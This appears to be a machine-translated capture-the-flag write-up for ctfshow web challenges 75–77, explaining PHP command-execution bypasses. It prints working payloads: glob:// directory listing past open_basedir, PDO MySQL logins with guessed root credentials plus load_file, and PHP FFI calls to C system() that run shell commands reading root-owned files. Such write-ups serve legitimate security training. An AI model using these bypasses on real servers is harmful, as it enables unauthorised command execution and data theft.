Ctfshow web getting started command execution web75-77

I've been painting in recent days ctfshow Of web Introduction to the command execution part of the exercise , Learned a lot of new postures , Simply record your understanding of the last few problems

web75

Due to the existence open_basedir Configuration limitations , Can't use scandir Function to list directory information , have access to glob The agreement bypasses open_basedir The limitation of , Found at root flag36.txt file .

c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
    
	echo($f->__toString().' ');
}exit();

This question is also passed include_path Limits the path contained in the file , Cannot be used directly include Include get flag Information , So I tried to use uaf To bypass the restriction of command execution , But because this topic filters strlen, I also tried to rewrite it in several ways strlen function , But none of them succeeded , If the subsequent rewriting is successful, it will be updated in time , Therefore, refer to the prompt information to use PDO Connect MySQL Read from the database flag Information ,payload as follows .

$dsn = "mysql:host=localhost;dbname=information_schema";
$db = new PDO($dsn, 'root', 'root');
$rs = $db->query("select database()");
foreach($rs as $row){
    
        echo($row[0])."|"; 
}exit();

In the video explanation, it is mentioned that the database name can be obtained ctftraining, But I try to use the ant sword connection to filter the problem environment that is not strict , In the login mysql There is always a segment error , But even if you don't know the database name ctftraining, You can also connect to the default database information_schema Reach the directory of command execution , Just guess mysql Just use your username and password .

By connecting to the default database information_schema Query database name , It is found that there is indeed a named ctftraining The database of .

$dsn = "mysql:host=localhost;dbname=information_schema";
$db = new PDO($dsn, 'root', 'root');
$rs = $db->query("select group_concat(SCHEMA_NAME) from SCHEMATA");
foreach($rs as $row){
    
        echo($row[0])."|"; 
}exit();

Use load_file Function read flag File is available flag Information

web77

This problem still makes use of glob The agreement bypasses open_basedir The limitation of , List all files in the root directory , Two suspicious files were found , Namely flag36x.txt and readflag

c=$a=new DirectoryIterator("glob:///*");
foreach($a as $f){
    
	echo($f->__toString().' ');
}exit();

Try to use web75 and 76 The idea of , Use PDO Connect MySQL database , And then use load_file Function bypasses the restriction of file reading , Read flag, But the newspaper could not find driver Error of , Indicates that this question cannot be used PDO Connect to database .
see writeup, This question uses PHP 7.4+ Of FFI characteristic , That is, external function interface features , Please check the relevant documents PHP manual , I'm mainly right here payload Simple analysis of information .

$ffi = FFI::cdef("int system(const char *command);");// Create a system object 
$a='/readflag > 1.txt';// No echo 
$ffi->system($a);// adopt $ffi To call system function 

PHP The manual says FFI:cdef The description of the prototype is public static FFI::cdef(string $code = "", ?string $lib = null), among $code For a string , Include general C A series of statements in a language ,$lib Is the name of the shared library file to load and link , If omitted lib, Then the platform will try to find the symbols declared in the code in the global scope , Other systems will not be able to parse these symbols .
At first I thought payload The meaning of the first line of code in is , Don't offer $lib In the case of information , Will call by default PHP Medium system function , But actually int system(const char *command); That is to say C In language system Definition of function , Used to execute system commands , Also in Linux Under the platform /readflag > 1.txt Use shell Parse and execute , So guess readflag It could be an executable .

• Use FFI call C In language system Function to list the root directory

c=$ffi = FFI::cdef("int system(const char *command);");
$a='ls / > 1.txt';
$ffi->system($a);exit();

• Attempt to read directly /flag36x.txt, visit 1.txt There is nothing after

c=$ffi = FFI::cdef("int system(const char *command);");
$a='cat /flag36x.txt > 1.txt';
$ffi->system($a);exit();

• Attempt to read /readflag file , Successfully read , by ELF Executable file

c=$ffi = FFI::cdef("int system(const char *command);");
$a='cat /readflag > 1.txt';
$ffi->system($a);exit();

• guess /flag36x.txt The file could not be read because of insufficient permissions , List the file permission information of the root directory , It is found that this file does not have read permission for other users , The user who executes the command is www-data, So it can't be used directly cat Read file contents .

c=$ffi = FFI::cdef("int system(const char *command);");
$a='ls -lst / > 1.txt';
$ffi->system($a);exit();

• Use IDA see /readflag The contents of the executable file , Confirmed the speculation between
  
  Through execution readflag File is available flag Information